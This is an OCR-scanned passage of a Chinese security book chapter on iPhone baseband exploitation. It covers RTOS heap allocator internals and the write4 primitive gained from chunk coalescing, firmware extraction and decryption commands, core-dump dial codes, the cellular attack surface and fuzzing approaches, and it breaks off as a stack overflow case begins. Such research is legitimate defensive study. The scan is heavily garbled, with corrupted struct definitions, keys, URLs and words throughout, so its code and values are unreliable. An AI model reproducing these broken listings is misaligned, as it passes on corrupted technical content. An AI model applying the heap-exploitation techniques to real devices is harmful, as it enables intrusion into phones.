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以 超级 用 户 模式 运行 的 ， 实 际 的 应 用 (本 例 中 就 是 蜂 窗 协议 栈 ) 则 不 是 。 包 括 驱 动 程序 在 内 的 
AMSS 完 全 是 以 用 户 模 式 运 行 的 。 


11.3.4” 堆 的 实现 


本 节 会 深入 介绍 这 几 种 操作 系统 的 堆 内 存 管 理 内 情 。 大 家 应 该 多 少 对 利用 这 里 提供 的 信息 进 
行 的 堆 缓冲 区 溢出 漏洞 攻击 有 些 熟 悉 了 。 

1. Nucleus PLUS 中 的 动态 内 存 

Nucleus PLUS 利 用 简单 的 首次 适应 ( first-fit ) 分 配 程序 管理 动态 内 存 。 对 于 利用 NU_ 
Create_Memory_Pool () 创建 的 内 存 池 而 言 ， 要 创建 形式 如 下 所 示 的 内 存 池 控 制 块 : 


struct dynmem pcb 


























{ 





void *Cs_prev; 
void *cCs_next; 
Uint32. CS Drios 
void “te tol Bt 
Nt 92 七 tc_wait_ flag; 
Uint32. 七 id; /* magic 值 ['DYNA'] */ 
char name[8]; /* 动态 内 存 池 的 名 称 */ 
void *start_addr; /* 内存 池 的 起 始 地 址 */ 
uint32_t pool_size; /* 内 存 池 的 大 小 */ 
int32. 七 min alloc; /* 最 小 分 配 大 小 */ 
uint32 七 available; /* 总共 可 用 字 节 数 */ 
struct dynmem hdr *memory_list; /* 内 存 链表 */ 
struct dynmem hdr *search_ ptr /* 查找 指针 */ 
uint32_t fifo_suspend; /* 挂 起 类 型 标志 */ 
uint32_t num waiting; /* 等 待 中 的 任务 的 数量 */ 
void *waiting_list; /* 挂 起 链表 */ 

}; 

由 NU_Allocate_Memory () 分 配 的 每 个 内 存 块 都 含有 结构 ( 16 字 节 ) 如 下 的 头 部 : 


struct dynmem hdr 


{ 


struct dynmem hdr *next_blk, /* 后 继 内 存 块 */ 
*prev_blk; /* 前 驱 内 存 块 */ 

bool is_free; /* 内 存 块 空闲 标志 */ 

struct dynmem pcb *pool_pcb; /* 动态 内 存 池 指针 */ 


} 
在 分 配 动 态 内 存 之 前 ， 我 们 至 少 需 要 用 NU_Create_Memory_Pool (pcb, name, start_ 
addr，size，min alloc，suspend_t) 创 建 一 个 内 存 池 。 
口 pcp 指向 内 存 池 控 制 块 的 指针 。 
D name ASCII 码 表示 的 内 存 池 名 称 。 
口 start_addr 该 内 存 池 中 可 用 于 分 配 的 第 一 个 内 存 地 址 。 
D pool_size 内 存 池 的 大 小 ， 以 字 节 为 单位 。 
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口 min alloc 每 次 分 配 的 最 小 内 存 大 小 ， 以 字 节 为 单位 〈 分 配 更 少 的 内 存 会 自动 取 大 为 
min alloc )。 
口 suspend t 暂停 的 类 型 ( 是 否 为 FIFO )。 

该 内 存 池 会 让 pcb 被 初始 化 ， 它 是 大 小 为 (pool_size - 2 * dynmem_hdr) 的 单 块 内 存 ， 
而 且 末 端 在 由 pcb->memory_list 指 向 的 循环 链表 中 。 

利用 NU_Allocate_Memory (pcb，&ptr_to_allocation，size，NU_NO_SUSPEND) 分 
配 内 存 块 会 执行 如 下 算法 。 

(1) 利用 mem ptr 变量 对 由 pcb->search ptr 指 向 的 内 存 链 表 进 行 迭代 。 
对 于 每 个 内 存 块 都 要 检查 是 否 设 置 了 is_free 标 志 。 如 果 设 置 了 ， 就 令 memblk_size = 
(mem_ptr->next_blk - mem ptr - 16)。 接 着 检查 是 否 有 memblk_size >= size。 如 果 
满足 该 条 件 ， 该 算法 就 已 经 找到 了 合适 的 内 存世 

(2) 如 果 没 找到 合适 的 内 存 块 ， 就 返回 错误 条 件 ， 或 是 暂停 任务 ( 取决 于 是 否 允 许 暂 停 )。 

(3) 如 果 (memblk_size - size) > (min_alloc + 16)， 就 把 内 存 块 分 为 两 块 ， 并 在 链 
表 末 端 插入 空闲 内存 块 。 

释放 内 存 块 要 使 用 NU_Deallocate_Memory (blk) , 释放 浮 数 会 假设 daynmem_hdr 在 blk 之 前 。 

这 里 不 会 对 dynmem_hgr 结 构 体 本 身 执行 检查 , 但 要 检查 内 存 池 指 针 是 否 非 NULL, 还 要 检查 
内 存 池 控制 块 的 magic value 是 否 匹配 。 在 把 内 存 块 再 次 标记 为 空闲 ， 并 调整 内 存 池 中 可 用 字 节 数 
之 后 , 通过 检查 其 前 驱 内 存 块头 部 和 后 继 内 存 块头 部 的 1s_free 标 志 , 该 函数 首先 会 检查 已 释放 
的 内 存 块 能 否 与 它 的 前 驱 内 存 块 合并 , 然后 检查 它 能 否 与 其 后 继 内 存 块 合并 。 这 一 过 程 通常 称 作 
合并 (coalescing )。 该 操作 会 为 攻击 者 提供 所 谓 的 无 限制 write4 原 语 ， 这 样 就 可 以 利用 堆 缓 冲 区 
溢出 在 内 存 中 任何 位 置 写 人 任意 的 32 位 值 。 

2. ThreadX 中 的 字 节 池 

ThreadX 也 使 用 了 首次 适应 分 配 程序 ， 其 工作 机 制 0 PLUS 的 分 配 程序 
十 分 相似 , 但 还 是 存在 一 些 明显 区 别 , 我 们 在 这 里 详细 介绍 一 下 。 字 节 池 的 控制 块 具有 如 下 结构 
( 取 自 tx_apih 文 件 ): 


typedef struct TX_BYTE_POOL_STRUCT 
{ 






























































/* 定义 用 于 错误 检查 的 字 节 池 ID */ 

ULONG tx_byte_pool_id; 

/* 定义 字 节 池 的 名 称 */ 

CHAR_PTR tx_ byte pool_ name; 

/* 定义 该 字 节 池 中 可 用 的 字 节 数 */ 

ULONG tx_byte pool available; 
/* 定义 该 字 节 池 中 的 片段 数 */ 

ULONG tx _byte pool_ fragments; 
/* 定义 字 节 池 的 头 指 针 */ 

CHAR_PTR tx_ byte pool_ list; 

/* 定义 查找 指针 ， 用 于 在 字 节 池 中 对 内 存 的 初次 查找 */ 
CHAR_PTR tx _byte pool_ search; 

/* 保存 字 节 池 所 在 内 存 区 域 的 起 始 地 址 */ 
CHAR_PTR. 上 X_bpyte_Pool_Sstart， 
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/* 保存 字 节 池 的 大 小 ， 单 位 为 字 节 */ 
ULONG tx_ byte_ pool_ size; 
/* 这 用 于 在 查询 过 程 中 标记 字 节 内 存 池 的 所 有 者 。 
如 果 该 值 在 查询 期 间 发 生 改 变 ， 
该 局 部 指针 必须 重 置 */ 
struct TX THREAD_STRUCT *tx_ byte pool_owner; 





/* 定义 字 节 池 挂 起 链表 的 表 头 ， 以 及 有 多 少 线程 被 挂 起 */ 
struct TX_THREAD_STRUCT *tXx_byte_pool_suspension list; 
ULONG tx_byte_ pool_suspendeqd count; 
/* 定义 所 创建 链表 的 后 继 指 针 和 前 驱 指针 */ 
struct TX _ BYTE POOL STRUCT 

*tx byte pool_ createdqd next, 

*tx_ byte pool_ created previous; 














} TxX_BYTE_POOL; 

内 存 块 的 头 部 是 由 两 部 分 组 成 的 ， 一 部 分 是 表示 该 特定 内 存 块 已 被 分 配 ( 由 magic value 
0xFFFEEEEE 表 示 ) 或 仍 被 视 作 “ 空 闪 ”的 字段 ， 男 一 部 分 是 指 回 字 节 池 控制 块 的 指针 : 

struct bpmem hdr { 


uint32_t is_free magic; /* 如 果 内 存 块 是 空闲 的 ， 则 置 为 OXFFFFEEEE */ 
TX_BYTE_POOL bpcb; /* 指向 字 节 内 存 池 控制 块 的 指针 */ 





























} 

用 于 从 给 定 的 字 节 池 中 分 配 内 存 块 的 tx_byte_allocate() 函数 不 会 直接 遍历 tx_- 0 
pool_1ist， 而 是 会 调用 fing_byte_block() 限 数 完成 这 一 工作 。 如 果 男 一 线程 已 经 在 字 
中 暂停 ， 我 们 就 要 通过 tx_byte_release() 调 用 finq_pyte_block() 函数 。 
后 并 不 会 直接 发 生 人 合并， 而 是 有 所 延迟 。 如 果 没 有 其 他 线程 处 于 等 待 中， 在 调用 
tx_byte_release() 时 就 具有 头 部 的 1s_free_magic 会 被 更 新 。 而 只 有 在 找 不 到 所 请 求 大 小 的 
内 存 块 时 ，fing_byte_block() 中 才 会 合并 被 标记 为 空闲 的 邻接 内 存 块 。 

3. 高 通 调制 解 调 器 堆 

仔细 了 解 高 通 的 协议 栈 ， 你 就 会 发 现 AMSS 实 际 上 使 用 了 多 种 不 同 的 堆 实 现 。 因 为 调制 解 调 
器 的 栈 缓冲 区 分 配 未 使 用 Iguana 分 配 程序 ， 所 以 我 们 在 这 里 没 必 要 介绍 该 分 配 程序 。 这 里 要 研究 
的 是 使 用 最 为 广泛 的 分 配 程序 ， 它 似乎 是 AMSS 中 的 系统 分 配 程序 ， 而 且 根据 从 amss.mbn 二 进 制 
文件 找到 的 字符 串 来 判断 ， 它 的 名 称 应 该 是 nodaem_mem_alloc()。 

与 之 前 两 种 分 配 程序 不 同 ， 该 分 配 程序 是 最 佳 适 应 ( best-fit ) 分 配 程序 ， 相 比 之 下 它 要 复杂 

得 多 而 且 更 稳定 一 些 。 我 们 没 办 法 详尽 描述 该 分 配 程序 , 不 过 会 把 精力 集中 在 最 重要 的 一 些 功能 

We 

该 分 配 程 序 没有 利用 内 存 块 链表 , 而 是 使 用 了 31 个 不 同 大 小 的 内 存 箱 。 这 些 内 存 箱 可 以 容纳 
的 内 存 分 配 大 小 分 别 是 0x4、0x6、0x8、0xC、0x10、0x18、0x20、0x30、0x40、0x60 、0x80、 
0xCO、 0x100、0x180、0x200、0x300、0x400、0x600、0x800、0xC00、0x1000、0x1800、 
0x2000、0x3000、0x4000、0x6000、0x8000、0xc000、0x10000、0x18000 和 0x20000。 
这 些 内 存 箱 中 内 存 块 的 实际 大 小 要 比 内 存 箱 的 标 称 大 小 大 16 字 节 ， 从 而 把 元 数据 和 8 字 节 的 边界 
对 齐 考 虑 在 内 。 内 存 块 的 头 部 如 下 所 示 : 
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struct mma_ header { 
uint32 t size; /* 分 配 的 大 小 */ 
uint32_t *next; /* 指向 后 继 内 存 块 的 指针 */ 
uint8_t reference; 


/* 用 于 区 分 不 同调 用 者 的 参照 值 */ 


uint8_t blockstatus; /* 确定 内 存 块 是 空闲 还 是 被 占用 */ 
uint8_t slackspace; /* 内 存 块 尾部 的 闲置 空间 */ 
uint8_t canary; /* 用 于 确定 内 存 损 坏 的 canary 值 */ 


} 
对 于 空闲 的 内 存 块 使 用 了 如 下 数据 结构 : 
struct mma_free block { 


mma_header hdr; 
mma_header *next_ free, *prev_free; 


/* 空闲 内 存 块 的 双向 链表 */ 
} 


该 分 配 程 序 使 用 的 canary 值 是 0x6A。 每 当 mma_header 结 构 体 被 访问 都 要 执行 检查 ， 以 确认 
该 canary 值 是 否 保持 不 变 ， 如 果 变 化 了 就 将 强制 产生 前 泪 。 该 功能 通常 对 意外 造成 〈 而 非 有 意 为 
之 ) 的 内 存 损坏 更 有 意义 ， 而 在 对 该 栈 进行 模糊 测试 时 你 应 该 记 住 这 一 情况 。 对 于 堆 漏洞 攻击 来 
说 还 有 一 项 值得 注意 的 功能 , 即 分 配 程序 会 检查 传递 给 modqem_mem_free (ptr) 的 指针 是 否 真正 
指向 该 堆 所 使 用 的 内 存 区 域 。 因 此 在 该 栈 中 创建 假 的 堆 结构 是 不 起 作用 的 。 

到 iOS 5.1 出 现时 , 之 前 介绍 的 堆 分 配 程序 已 经 通过 添加 安全 解 链 检查 得 到 强化 , 具体 方式 就 
是 在 执行 解 链 操作 之 前 ， 由 分 配 程 序 检查 是 否 有 free_block->next_free->prev_free == 


free block->prev_free->next_free。 
11.4 漏洞 分 析 


之 前 几 节 足够 详细 地 介绍 了 与 GSM 和 实时 操作 系统 有 关 的 内 容 , 涵盖 了 大 家 需要 熟悉 的 各 种 
基础 知识 ,接着 我 们 就 要 触及 事情 的 核心 了 : 找到 可 以 利用 的 漏洞 。 在 着 手 之 前 ， 我 们 还 需要 解 
释 进 行 实际 分 析 时 的 一 些 操作 事项 。 


11.4.1 获得 并 提取 基带 固件 


基带 固件 的 升级 是 在 普通 的 iOS 升 级 (还原 ) 过 程 中 进行 的 。 对 于 直到 iPhone 3GS 的 较 旧 型 
号 的 iPhone 以 及 iPad 1 而 言 ， 这 一 固件 都 包含 在 ramdisk 镜 像 中 。 要 提取 该 固件 ， 我 们 就 需要 解密 
和 挂 接 该 镜像 ， 并 从 /usr/local/standalone/firmware 复 制 固件 镜像 。 为 了 从 iOS 3.1.3 更 新 中 提取 
iPhone 2G 的 基带 固件 ICE04.05.04_G.fls, 我 们 可 以 使 用 planetbeing 开 发 的 给 力 工 具 xpwntool( 可 
以 从 https://github.conyplanetbeing/xpwn 下 载 该 工具 )， 按 照 如 下 步骤 进行 操作 : 


$ wget -gq http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/ 
061-7481.20100202.4orot/iPhone1l1,1 3.1.3_7E18_Restore.ipsw 
$ unzip 1IPhone1l1,1 3.1.3_7E18_ Restore.ipsw 018-6488-015.dmg 
Archive: 1IPhone1,1 3.1.3_7E18_Restore.ipsw 
inflating: 018-6494-014.dmg 
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$ xpwntool 018-6494-014.dmg restore.dmg -k 7029389c2dadaaaldle51bf579493824 -1V 
25e713dd5663badebe046d0ffal64fee 

$ open restore.dmg 

cp /Volumes/ramdisk/usr/local/standalone/firmware/ICE04.05.04_G.fls. 

$ hdiutil eject /Volumes/ramdisk 


Ur 





注意 这 里 用 作 xpwntool 参 数 的 这 些 密 钥 可 以 在 Phone Wiki 上 找到 (http://theiphonewiki.com/ 
wiki/index.php?title=VFDecrypt Keys )。 


对 于 较 新 型 号 的 iPhone 和 让 ad 2 来 说 ,我 们 可 以 利用 解压 缩 工 具 直 ee 
在 代码 清单 11-1 中 ，ICE3 固 件 是 在 iPhone 4 中 的 X-Gold 61x 系 列 芯 片上 运行 的 固件 版 本 ， 而 这 
Trek 文 件 用 于 升级 iPhone 4S 中 的 MDM6610 上 运行 的 固件 。 


代码 清单 11-1 iPhone 4S 5.0.1 更 新 中 包含 的 基带 固件 


$ unzip -1 iPhone4,1 5.0.1 9A406_ Restore.ipsw Firmware/ [IT]\*bbfw 
Archive: iPhone4,1 5.0.1 9A406_Restore.ipsw 








Length Date Time Name 

3815153 12-04-11 02:07 Firmware/ICE3_04.11.08_BOOT 02.13.Release.bbfw 
11154725 12-04-11 02:07 Firmware/Trek-1.0.14.Release.bbfw 
14969878 2 files 





这 些 .bbfw 文 件 本 身 也 是 ZPP 归 档 文件 ， 而 且 含有 实际 的 基带 固件 和 知 二 加载 器 : 


$ unzip -1 ICE3 04.11.08_BOoT 02.13.Release.bbfw 








Archive: ICE3_04.11.08_BOOT_02.13.Release.bbfw 
Length Date Time Name 
72568 01-13-11 04:14 psi_ram.fls 


64892 01-13-11 04:14 ebl.fls 
7308368 12-04-11 02:07 Stack 上 1S 
40260 01-13-11 04:14 psi_flash.fls 


7486088 4 files 


$ unzip -1 Trek-1.0.14.Release.bbfw 
Archive: Trek-1.0.14.Release.bbfw 
Length Date Time Name 
19599360 12-03-11 10:06 amss .mbn 
451464 12-03-11 10:06 osbl .mbn 
122464 12-03-11 10:06 dbl .mbn 
122196 12-03-11 10:06 restoredbl .mbn 


20295484 4 files 
这 里 只 有 对 应 X-Gold 的 stack.fls 文 件 和 对 应 MDM66x0 系 列 芯 片 组 的 amss.mbn 文 件 才 是 我 们 
感 兴趣 的 。 其 他 文件 都 只 是 加 载 器 文件 ,不 过 我 们 在 此 不 做 进一步 研究 ， 虽 然 原 则 上 讲 它们 也 可 








十 
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能 包含 严重 的 安全 漏洞 ， 比 方 若 固件 签名 验证 过 程 中 存在 漏洞 ,就 有 可 能 让 攻击 者 在 设备 上 运行 
其 他 的 固件 从 而 让 该 设备 解锁 。 


11.4.2 ”将 固件 镜像 载 入 IDA Pro 


英 飞 凌 的 .fs 文件 是 利用 官方 的 ARM Compiler Toolchain ( ARM 编 译 工 具 链 ) 创建 的 ,根据 具 
体 的 基带 固件 版 本 , 既 可 能 是 使 用 ARM RealView Development Suite( RVDS ), 也 可 能 是 使 用 ARM 
Development Suite (ADS )。ARM 的 链接 器 采用 了 “分 散 载 人 ”( scatter loading ) 机 制 以 节省 闪存 
空间 。 在 进行 链接 时 ， 所 有 代码 段 和 具有 已 初始 化 数据 的 数据 段 会 串 接 在 一 起 ,并 且 我 们 可 以 选 
择 两 种 简单 游程 编码 算法 中 的 一 种 对 这 些 段 进行 压缩 。 我 们 还 要 用 指向 这 些 区 域 的 指针 以 及 对 应 
需要 初始 化 为 0 的 区 域 的 数据 项 构建 一 个 数据 表 。 在 运行 时 ， 启 动 代码 会 对 该 表 进 行 迭代 ， 把 这 
些 代 码 段 和 数据 段 复制 到 它们 在 内 存 中 的 实际 位 置 ， 并 根据 要 求 创建 那些 需要 初始 化 为 0 的 内 存 
区 域 。 

这 意味 着 在 对 .fs 文件 进行 任何 有 意义 的 分 析 之 前 ， 我 们 需要 执行 这 些 启 动 代 码 所 完成 的 各 
步 工作 。 大 家 可 以 通过 寿 干 种 方式 完成 这 一 工作 。 第 一 种 是 IDA Pro 的 教程 中 描述 的 , 利用 QEMU 
模拟 器 直接 执行 启动 序列 。 第 二 种 方式 是 通过 使 用 脚本 或 加 载 器 模块 , 把 固件 重新 安置 到 它 在 内 
存 中 的 位 置 。 由 roxfan 编 写 的 通用 分 散 载 人 脚本 已 经 在 iPhone 黑客 圈 中 流传 一 段 时 间 了 ; 而 我 们 
编写 和 发 布 了 一 个 针对 iPhone 基带 固件 的 IDA Pro 模 块 ( flsloader ), 它 包 含 了 这 一 功能 。 大 家 可 以 
在 本 书 的 配套 网 站 ( www.wiley.com/go/ioshackershandbook ) 上 下 载 它 的 代码 。 其 中 还 含有 
make_tasktable.py 脚 本 ， 它 可 以 自动 识别 由 Nucleus PLUS 中 的 Application_Initialize() 
或 ThreadX 中 的 tx_application define() 创 建 的 任务 表 。 

高 通 的 固件 文件 都 是 标准 的 ELF ( Executable and Linkable Format， 可 执行 且 可 链接 格式 ) 文 
件 ， 大 家 在 载 和 人 它们 时 不 需要 使 用 自 定义 的 IDA Pro 加 载 器 模块 。 



















































































11.4.3 ”应 用 /基带 处 理 器 接口 


细 看 基带 处 理 器 与 应 用 处 理 器 间 的 连接 ， 你 就 会 发 现 与 AT 命 令 解释 器 的 交流 不 是 直接 在 串 
行 线 路 上 进行 的 ， 而 是 有 很 多 内 容 复 用 串 行 线路 ( 英 飞 凌 蕊 片 ) 或 通用 串 行 总 线 (高 通 芯 片 )。 
英 飞 凌 基 带 人 处 理 器 的 复 用 是 在 符合 3GPP 27.007 规 范 的 com.apple.driver.AppleSerialMultiplexer 内 
核 扩 展 中 完成 的 。 高 通 基带 处 理 器 则 用 到 了 高 通 专 有 的 协议 一 一 高 通 MSM 接 口 ( QMI)。 在 由 
CodeAurora 论 坛 创建 的 用 于 MSM 平 台 的 Linux 内 核 分 支 ( https://www.codeaurora.org/contribute/ 
projects/qkernel ) 中 ， 我 们 能 找到 某 种 QMI 实 现 的 源 代码 。 


11.4.4” 栈 跟踪 与 基带 核心 转 储 
为 了 分 析 漏 洞 并 ( 更 重要 的 是 ) 实际 利用 这 些 漏洞 ， 对 系统 崩溃 时 的 状况 以 及 可 能 情况 下 对 


















































系统 运行 时 的 状况 有 所 了 解 是 极为 重要 的 。 
对 于 使 用 英 飞 凌 基 带 的 iOS 设 备 而 言 ， 大 家 可 以 使 用 AT+XLOG 命 令 获得 基带 骨 溃 日 志和 它们 二 
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的 栈 跟踪 。 更 妙 的 是 ， 在 X-Gold 世 片上， 我 们 可 以 在 不 实际 利用 bug 的 情况 下 触发 基带 内 存 的 核 
心 转 储 。 想 这 样 做 ， 你 首先 需要 启用 该 功能 ， 这 可 以 通过 在 拨号 程序 中 拨 叫 特定 字符 串 〈 由 
CommCenter 解 析 ) 来 实现 。 通 过 呼叫 号 码 *5005*CORE#， 我 们 就 可 以 启用 核心 转 储 功能 (呼叫 
#5005*2673# 关 闭 该 功能 ,而 呼叫 *#5005*2673# 可 以 显示 设置 状态 )。 利 用 minicom 工 具 , 大 家 
可 以 把 AT 命令 ar+XLOG=4 发 送 给 基带 ， 从 而 触发 异常 ， 这 样 就 能 让 基带 内 存 转 储 。 转 储 文件 是 
按 内 存 区 域 分 割 的 , 而 且 会 被 存储 在 /var/wireless/Library/Logs/CrashReporter/Baseband 目 录 下 形 如 
log-bb-yyyy-mm-dd-hh-mm-ss-cd 的 目录 中 。 























# cd /var/wireless/Library/Logs/CrashReporter/Baseband 
/log-bb-2012-01-17-11-36-07-cd 


# ls -1 

total 9544 

-rwWw-r--r-- 1 wireless _wireless 65544 Jan 17 11:36 0x00090000.cd 
-rwWw-r--r-- 1 wireless _wireless 16760 Jan 17 11:39 0x40041000.cd 
-rw-r--r-- 1 wireless wireless 262152 Jan 17 11:40 0x40ac0000.cd 
-rw-r--r-- 1 wireless wireless 262152 Jan 17 11:40 0x40b00000.cd 
-rw-r--r-- 1 wireless _wireless 539372 Jan 17 11:36 0x60700000.cd 
-rwWw-r--r-- 1 wireless _wireless 8564860 Jan 17 11:39 0x60784ae4.cd 


-rw-r--r-- 1 wireless wireless 16392 Jan 17 11:36 Oxffff0000.cd 
如 果 正 确 地 完成 了 这 些 操作 ,你 的 Phone 屏 幕 上 就 会 有 数秒 显示 内 容 为 “Baseband Core Dump 
in Progress”( 基带 核心 正在 转 储 ) 的 消息 。 


11.4.5” 受 攻击 面 


本 节 会 对 基带 处 理 器 提供 的 受 攻击 面 进行 评估 。 对 于 本 地 漏洞 攻击 ， 通 过 AT 命 令 解 释 器 暴 
露 的 函数 会 在 软 解锁 中 受到 攻击 , 不 过 这 并 不 是 执行 本 地 攻击 的 唯一 方式 。 另 一 条 在 过 去 已 被 成 
功利 用 的 途径 是 SIM 与 基带 处 理 器 之 间 的 接口 ， 一 个 名 为 JerrySIM 的 漏洞 攻击 程序 就 利用 了 该 途 
径 。 该 接口 暗藏 相当 大 的 复杂 性 ， 特 别 是 考虑 到 来 自 SIM 的 STK (SIM Application Toolkit，SIM 
应 用 工具 包 ) 和 USAT (USIM Application Toolkit，USIM 应 用 工具 包 ) 消息 需要 得 到 解析 和 处 理 
这 一 事实 。 对 于 高 通 基带 而 言 ， 其 USB 栈 也 可 能 成 为 本 地 攻击 的 可 行 目标 。 根 据 linux-arm-msm 
邮件 列表 中 发 布 的 邮件 列表 来 看 ， 高 通 公 司 似乎 为 相应 的 栈 使 用 了 ChipIdea 核 心 。 有 趣 的 是 ， 
X-Gold 61x 系 列 芯片 组 的 基带 固件 也 包含 USB 栈 ， 不 过 它 似乎 没 办 法 从 应 用 处 理 器 访问 。 
























































注意 软 解锁 是 对 蜂窝 协议 栈 的 非 永久 性 修改 ,每 当 基 带 处 理 器 重启 后 都 需要 重新 应 用 ， 一般 
是 通过 注入 任务 实现 的 。 这 与 较 早 时 候 那些 称 为 硬 解 锁 的 解锁 工具 不 同 ， 硬 解锁 会 永久 
替换 存储 在 闪存 中 的 基带 国 件 。 








在 勘察 通过 空中 接口 暴露 出 的 蜂窝 协议 栈 受 攻击 面 时 , 大 家 是 从 最 底层 开始 的 。 音 频数 据 的 
解码 器 是 内 存 损坏 漏洞 的 常见 来 源 , 即便 在 GSM 协 议 栈 的 领域 中 也 是 如 此 。 仔细 查看 , 你 就 会 找 
到 通过 空中 接口 发 送 长 度 字 段 的 语音 编 解码 器 ,而 所 考虑 的 蜂窝 协议 栈 有 可 能 信任 它 , 也 有 可 能 
不 信任 它 。 不过, 这 种 漏洞 对 攻击 者 的 不 利之 处 在 于 ,它们 需要 已 建立 的 语音 连接 为 前 提 。 上 至 
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数据 链 路 层 的 内 存 损坏 漏洞 在 这 一 层 也 是 可 能 出 现 的 ,不 过 过 短 的 帧 ( 17 字 节 ) 不 利于 开展 漏洞 
攻击 。 

大 家 在 网 络 层 就 能 获得 大 把 的 机 会 了 。 要 想 一 探究 竟 ， 你 就 需要 查阅 GSM 04.08 规 范 的 继任 
者 一 一 3GPP24.008 规 范 ， 从 而 了 解 L3 层 上 的 消息 是 如 何 编码 的 : 消息 最 长 可 以 为 233 字 节 ， 而 且 
有 多 种 不 同 的 编码 方式 。 这 个 “好 ”标准 的 设计 者 显然 受到 ASN.1 的 影响 : 他 们 允许 多 种 协议 的 
消息 使 用 变 长 字段 。 在 很 多 情况 下 ， 即 便 是 那些 显 式 声明 为 定 长 的 实体 ,都 会 用 一 种 通过 空中 接 
口传 送 长 度 的 格式 编码 ， 给 解析 器 造成 歧义 。 不 过 ,这 还 不 是 攻击 者 唯一 的 福地 ， 继 续 向 上 进入 
L3 层 的 几 个 子 层 , 你 还 会 在 处 理 补充 数据 和 解析 短 消息 的 实现 中 发 现 大 量 损坏 内 存 的 机 会 。 最 后 
要 说 (但 也 同样 重要 ) 的 是 ， 蜂 窜 协 议 栈 所 允许 的 不 只 是 空间 性 内 存 破坏 这 一 种 形式 。 事 实 上 
GSM 协 议 栈 的 很 多 部 分 都 是 由 精密 、 大 型 、 复 杂 的 状态 机 驱动 的 , 这 就 让 实施 者 也 有 多 得 多 的 机 
会 引入 时 间 性 内 存 破坏 , 诸如 其 代码 库 中 的 使 用 后 释放 , 特别 是 考虑 到 这 些 状 态 机 中 某 些 数据 结 
构 的 分 配 和 释放 不 一 定 是 通过 同一 任务 完成 的 这 一 事实 。 

















注意 想 了 解 这 种 大 型 复杂 状态 机 的 例子 ， 请 参考 3GPP24.008 规 范 的 图 4.1a。 











不 过 ,在 没有 蜂窝 协议 栈 的 源 代码 或 相应 仪器 的 情况 下 ,识别 和 再 现时 间 性 内 存 损坏 是 个 难题 。 


11.4.6 ”二 进 制 代码 的 静态 分 析 


鉴于 IDA Pro 基 带 固件 数据 库 中 函数 的 数量 ， 就 算是 对 有 关内 存 损坏 的 代码 库 进 行 浅 层 审计 
都 将 是 项 巨大 的 任务 。 

在 基带 协议 栈 中 寻找 潜在 内 存 损坏 的 一 种 简单 方法 是 寻找 memcpy () 和 memmove () 这 样 执 
行内 存 块 传输 的 函数 和 类 似 函 数 ， 并 研究 这 些 函 数 中 有 哪些 可 以 让 攻击 者 对 长 度 和 (或 ) 传输 目 
的 地 取得 足够 的 控制 。 而且， 只 要 突 发 异常 就 会 记录 文件 名 和 行 号 ( 某 些 情况 下 还 包括 消息 和 结 
果 代 码 ) 的 代码 库 中 存在 着 各 种 断言 ,它们 也 对 完成 这 一 任务 有 所 帮助 ， 这 些 字 符 串 甚至 会 出 现 
在 基带 固件 的 生产 版 本 中 。 



































注意 想 找到 可 导致 内 存 损 坏 的 内 存 写 操作 ,我们 还 有 更 高 级 的 方法 可 用 ， 比 方 说 利用 了 支配 
节点 树 ( dominator tree ) 的 环 检测 (loop detection )。 想 了 解 更 多 信息 ， 请 参考 Halvar Flake 
在 Blackhat Federal 2003 上 的 演示 文档 “More fun with Graphs”， 以 及 Pete Silberman 在 
Uninformed 期 刊 第 一 期 上 发 表 的 有 关 环 检测 的 文章 。 





这 种 审计 方式 在 不 少 协议 栈 中 都 非常 成 功 ， 不 过 IFX 栈 中 大 量 的 内 存 副 本 传输 的 是 定 长 块 。 
11.4.7 ”由 规范 引路 的 模糊 测试 
还 有 一 种 寻找 潜在 内 存 破坏 的 方式 ， 即 仔细 阅读 GSM 和 3GPP 规 范 ， 留 意 传 输 的 所 有 消息 中 Te 
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具有 变 长 元 素 的 那些 。 对 于 这 些 消 息 来 说 ， 大 家 可 以 试 着 发 送 含 有 长 度 不 合 规范 (大 于 规范 允许 
的 最 大 值 或 小 于 规范 指定 的 最 小 值 ) 的 元 素 的 消息 ， 并 观察 这 是 否 在 设备 上 触发 了 骨 演 。 不 过 ， 
这 种 方法 存在 诸多 问题 。 首 先 , 虽然 对 于 那些 以 “无 状态 ”方式 运转 的 消息 ( 比如 与 移动 性 管理 
有 关 的 那些 功能 ) 进行 模糊 测试 比较 简单 ,但 在 试图 从 呼叫 控制 子 层 找 漏洞 时 ,一切 都 变 得 更 琼 
手 了 。 这 里 某 些 消息 只 有 在 已 经 建立 的 呼叫 中 才 可 用 。 其 次 ,大 家 需要 对 试图 进行 模糊 测试 的 协 
议 具有 相当 彻底 的 理解 。 对 于 GSM 而 言 这 是 很 困难 的 ， 因 为 协议 分 布 在 数 以 千 计 的 标准 文档 中 ， 
而 且 你 很 容易 忽视 它们 之 间 的 一 些 相 关 性 。 事实 上 ， 因 为 大 多 数 标准 都 经 过 多 次 修订 ， 如果 因为 
不 知道 某 个 栈 具体 遵循 的 是 GSM 标 准 的 哪个 修订 版 而 没有 关注 那些 修订 ， 你 就 会 错过 一 些 东西 。 
最 后 要 说 (但 也 同样 重要 ) 的 是 ,大 家 要 处 理 大 量 最 终 被 证 明 不 可 利用 的 月 演 ,而 且 要 花 上 很 长 
时 间 才 能 理解 哪些 崩 演 是 可 以 利用 的 。 一 般 来 说 ， 我 们 很 难 对 蜂窝 协议 栈 进行 有 效 的 模糊 测试 ， 
因为 规范 中 满 是 规定 明确 的 状态 机 ， 使 得 很 多 代码 路 径 很 难 到 达 。 

不 过 ， 要 注意 本 章 稍 后 会 描述 的 CVE-2010-3832 漏 洞 ， 它 就 是 通过 可 称 得 上 “由 规范 引路 的 
模糊 测试 ”的 过 程 找到 的 。 


11.5 ”对 基带 的 漏洞 攻击 


本 节 会 介绍 两 个 可 用 来 控制 基带 的 内 存 损坏 漏洞 的 例子 。 第 一 个 是 可 通过 AT 命 令 解 释 带 进 
行 攻击 的 本 地 漏洞 。 第 二 个 漏洞 可 用 于 在 空中 接口 上 对 有 漏洞 的 iPhone 进行 远程 攻击 ， 前 提 是 要 
在 该 机 附近 设置 流 谍 基站 。 

















































































































11.5.1 本 地 栈 缓 冲 区 浇 出 : AT+XAPP 


AT+XAPP 漏 洞 是 个 经 典 的 栈 缓冲 区 游 出 漏洞 ，ultrasn0w 解 锁 工 具 就 将 其 作为 一 种 注入 途 
径 。 所 有 S-Gold 2 基带 都 存在 该 漏洞 ， 版 本 不 高 于 05.13.04 (iPhone3/3GS ) 或 06.14.00 (iPad ) 的 
